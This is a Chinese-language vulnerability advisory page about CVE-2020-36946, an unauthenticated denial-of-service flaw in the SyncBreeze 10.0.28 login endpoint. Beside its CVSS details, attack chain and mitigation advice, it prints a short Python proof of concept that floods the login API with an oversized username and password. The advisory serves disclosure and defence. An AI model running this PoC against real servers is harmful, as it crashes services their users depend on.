IPBUF安全漏洞报告
English
CVE-2020-36946 CVSS 7.5 高危

CVE-2020-36946 SyncBreeze 10.0.28 登录拒绝服务漏洞

披露日期: 2026-01-27

漏洞信息

漏洞编号
CVE-2020-36946
漏洞类型
拒绝服务
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
SyncBreeze 10.0.28

相关标签

拒绝服务SyncBreezeCVE-2020-36946高危文件管理

漏洞概述

CVE-2020-36946是SyncBreeze企业版10.0.28版本中的一个拒绝服务漏洞。该漏洞存在于SyncBreeze的登录端点,攻击者可以通过发送超大的payload来耗尽服务器资源,导致服务崩溃。SyncBreeze是一款Windows平台的企业文件管理解决方案,广泛用于中小企业的文件共享和管理。攻击者无需任何认证即可利用此漏洞,使其成为高危安全风险。漏洞的CVSS评分为7.5,属于高危级别,主要影响系统的可用性。由于该产品通常部署在企业内部网络中,服务中断可能导致业务运营受阻,影响员工的日常文件访问需求。

技术细节

漏洞源于登录端点对输入验证不充分。攻击者构造包含超大数据的登录请求,服务器在处理时会分配大量内存,最终导致内存耗尽和服务崩溃。

攻击链分析

STEP 1
步骤1
攻击者识别运行SyncBreeze 10.0.28的目标服务器
STEP 2
步骤2
向登录端点发送超大payload的请求
STEP 3
步骤3
服务器处理请求时耗尽资源
STEP 4
步骤4
服务崩溃,可用性丧失

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests target = 'http://target:8090/api/login' payload = 'A' * 10000000 data = { 'username': payload, 'password': payload } response = requests.post(target, json=data) print(response.status_code)

影响范围

SyncBreeze 10.0.28

防御指南

临时缓解措施
限制登录请求的payload大小,实施速率限制

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表